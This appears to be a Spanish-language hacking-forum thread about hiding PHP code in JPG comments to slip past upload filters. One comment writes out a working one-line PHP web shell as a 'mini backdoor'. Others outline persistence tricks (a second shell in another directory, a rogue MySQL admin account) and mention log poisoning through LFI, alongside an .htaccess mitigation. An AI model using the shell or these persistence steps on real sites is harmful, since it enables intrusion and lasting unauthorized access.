No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Esto es lo mismo qe usar JPG-inclusion o para bypassear uploads?? osea usar Gimp ó wrjpgcom para insertar en un comentario el code PHP por ejemplo usar una misma shell como mini backdoor: <?php system($_GET['cmd']); die; ?>

exactamente eso mismo es una jpg inclusion, para bypasear uploads no serviria porq lo ejecutaria como jpg. necesitarias un .htaccess con addhandler para que lo ejecutara en otra extension , el autor deberia de poner que sin un file include esto no sirve de nada.

si haces copy paste al menos cita la fuente

nice yo añadiria , algo subir shell, por medio de esta subirle otra a otro dir, luego dejar el template tal y como esta y añadir un admin por mysql a la db en caso de que cambien el password :d

curioso el reto :d me gusto lastima que no pude participar :d se podria arreglar con un .htaccess que solo dejara leer archivos de imagen , no lo probe. pero  realmente es un LFI? o read file? si fuera lfi se podria shellear por log poisioning

pd se podria eliminar los capchas al postear no se ven muy bien..